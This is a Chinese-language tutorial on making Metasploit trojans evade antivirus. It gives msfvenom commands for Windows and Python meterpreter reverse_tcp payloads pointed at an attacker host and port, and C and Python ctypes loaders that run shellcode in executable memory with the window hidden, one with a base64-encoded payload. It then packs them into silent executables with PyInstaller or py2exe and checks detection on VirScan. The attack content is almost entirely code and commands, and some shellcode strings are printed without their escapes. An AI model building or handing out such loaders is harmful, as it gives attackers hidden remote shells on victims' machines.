msfvenom——木马免杀篇
c语言执行
生成shellcode.c
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c > shellcode.c
然后将生成的文件打开,复制十六进制代码,到结尾的分号。
c语言执行
复制到c语言中
//C语言执行shellcode的五种方法
#include <windows.h>
#include <stdio.h>
//data段可读写
#pragma comment(linker, "/section:.data,RWE")
//不显示窗口
#pragma comment(linker,"/subsystem:"windows" /entry:"mainCRTStartup"")
#pragma comment(linker, "/INCREMENTAL:NO")
//一段打开Windows计算器(calc.exe)的shellcode
unsigned char shellcode_calc[] =
"xb8x82x0ax8dx38xd9xc6xd9x74x24xf4x5ax29xc9xb1x23"
"x31x42x12x83xeaxfcx03xc0x04x6fxcdx38xf0x2bx2exc0"
"x01x3fx6bxfcx8ax43x71x84x8dx54xf2x3bx96x21x5axe3"
"xa7xdex2cx68x93xabxaex80xedx6bx29xf0x8axacx3ex0f"
"x52xe6xb2x0ex96x1cx38x2bx42xc7xc5x3ex8fx8cx99xe4"
"x4ex78x43x6fx5cx35x07x30x41xc8xfcx45x65x41x03xb2"
"x1fx09x20x40xe3x83xe8x2cx68xa3xd8x29xaex5cx15xba"
"x6fx91xaexccx73x04x3bx44x84xbdx35x1fx14xf1x46x1f"
"x15x79x2ex23x4ax4cx59x3bx22x27x5dx38x0ax4cxcex56"
"xf5x6bx0cxd5x61x14x2fx93x7cx73x2fx44xe3x1axa3xe9"
"xe4";
unsigned char shellcode[] =
"xd9xebx9bxd9x74x24xf4x31xd2xb2x77x31xc9x64x8b"
"x71x30x8bx76x0cx8bx76x1cx8bx46x08x8bx7ex20x8b"
"x36x38x4fx18x75xf3x59x01xd1xffxe1x60x8bx6cx24"
"x24x8bx45x3cx8bx54x28x78x01xeax8bx4ax18x8bx5a"
"x20x01xebxe3x34x49x8bx34x8bx01xeex31xffx31xc0"
"xfcxacx84xc0x74x07xc1xcfx0dx01xc7xebxf4x3bx7c"
"x24x28x75xe1x8bx5ax24x01xebx66x8bx0cx4bx8bx5a"
"x1cx01xebx8bx04x8bx01xe8x89x44x24x1cx61xc3xb2"
"x08x29xd4x89xe5x89xc2x68x8ex4ex0execx52xe8x9f"
"xffxffxffx89x45x04xbbx7exd8xe2x73x87x1cx24x52"
"xe8x8exffxffxffx89x45x08x68x6cx6cx20x41x68x33"
"x32x2ex64x68x75x73x65x72x88x5cx24x0ax89xe6x56"
"xffx55x04x89xc2x50xbbxa8xa2x4dxbcx87x1cx24x52"
"xe8x61xffxffxffx68x6fx78x58x20x68x61x67x65x42"
"x68x4dx65x73x73x31xdbx88x5cx24x0ax89xe3x68x58"
"x20x20x20x68x4dx53x46x21x68x72x6fx6dx20x68x6f"
"x2cx20x66x68x48x65x6cx6cx31xc9x88x4cx24x10x89"
"xe1x31xd2x52x53x51x52xffxd0x31xc0x50xffx55x08";
typedef void (__stdcall *CODE) ();
//http://rshell.blog.163.com/blog/static/41619170201110302937361/
//第一种方法
void RunShellCode_1()
{
PVOID p = NULL;
if ((p = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE)) == NULL)
MessageBoxA(NULL, "申请内存失败", "提醒", MB_OK);
if (!(memcpy(p, shellcode, sizeof(shellcode))))
MessageBoxA(NULL, "写内存失败", "提醒", MB_OK);
CODE code =(CODE)p;
code();
}
//第二种方法
void RunShellCode_2()
{
((void(*)(void))&shellcode)();
}
//第三种方法
void RunShellCode_3()
{
__asm
{
lea eax, shellcode;
jmp eax;
}
}
//第四种方法
void RunShellCode_4()
{
__asm
{
mov eax, offset shellcode;
jmp eax;
}
}
//第五种方法
void RunShellCode_5()
{
__asm
{
mov eax, offset shellcode;
_emit 0xFF;
_emit 0xE0;
}
}
void main()
{
//RunShellCode_1();
//RunShellCode_2();
//RunShellCode_3();
//RunShellCode_4();
RunShellCode_5();
}
eg:
#include "pch.h"
#include <iostream>
#include "stdio.h"
#include "Windows.h"
#pragma comment(linker,"/subsystem:"windows" /entry:"mainCRTStartup"") //去除窗口
//步骤b所在桌面产生的 shellcode.c的内容;
unsigned char shellcode[] =
void main()
{
//ShellExecute(NULL, _T("open"), _T("explorer.exe"), _T("https://www.baiud.com"), NULL, SW_SHOW);
LPVOID Memory = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(Memory, shellcode, sizeof(shellcode));
((void(*)())Memory)();
}
检查
查杀地址:http://r.virscan.org/language/zh-cn/report/dc322aacd4209d2a3366c9fb74a3442b
python语言执行
方法一:python加载C代码
import ctypes
shellcode = bytearray("xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8b")
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(shellcode)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(shellcode)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
然后要使用PyInstaller将py转为exe,pyinstaller依赖于pywin32,在使用pyinstaller之前,应先安装pywin32。
pywin32下载后,点击下一步安装即可
https://sourceforge.net/projects/pywin32/files/pywin32pyinstaller 下载
https://github.com/pyinstaller/pyinstaller/releases,解压,安装好依赖包pip install -r requirements.txt,即可使用。将
pyshellcode.py复制到C:Python27_x86pyinstaller目录中,在该目录下执行命令编译exe:
python pyinstaller.py -F -w pyshellcode.py
方法2:py2exe打包编译exe
该方法借用了免杀工具Python-Rootkit的思路。
首先要在windows上安装x86版的python。
注意:必须使用x86版本Python 2.7,即使Windows是x64的,也要安装32位版本。
我这里安装的是Python 2.7.16 x86 windows版:https://www.python.org/ftp/python/2.7.16/python-2.7.16.msi
之后安装32位Py2exe for python 2.7,https://sourceforge.net/projects/py2exe/files/py2exe/0.6.9/py2exe-0.6.9.win32-py2.7.exe/download
在Windows上安装OpenSSL(可选)
msfvenom生成python payload
msfvenom -p python/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -f raw -o shell.py
创建文件setup.py
from distutils.core import setup
import py2exe
setup(
name = "Meter",
description = "Python-based App",
version = "1.0",
console = ["shell.py"],
options = {"py2exe":{"bundle_files":1,"packages":"ctypes","includes":"base64,sys,socket,struct,time,code,platform,getpass,shutil",}},
zipfile = None
)
在msf中设置payloadwindows/meterpreter/reverse_tcp,监听相应3333端口。
在windows下执行python.exe .setup.py py2exe,(文件大小11M)
方法3:base64编码
和2.1方法一样,先生成shellcode, 先用msfvenom生成shellcode,记得要用base64编码:
msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 LHOST=10.211.55.2 LPORT=3333 -f c
python代码如下:
import ctypes
import base64
encode_shellcode = ""
shellcode = base64.b64decode(encode_shellcode)
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)
使用pyinstaller编译打包exe
python pyinstaller.py -F -w pyshellcode.py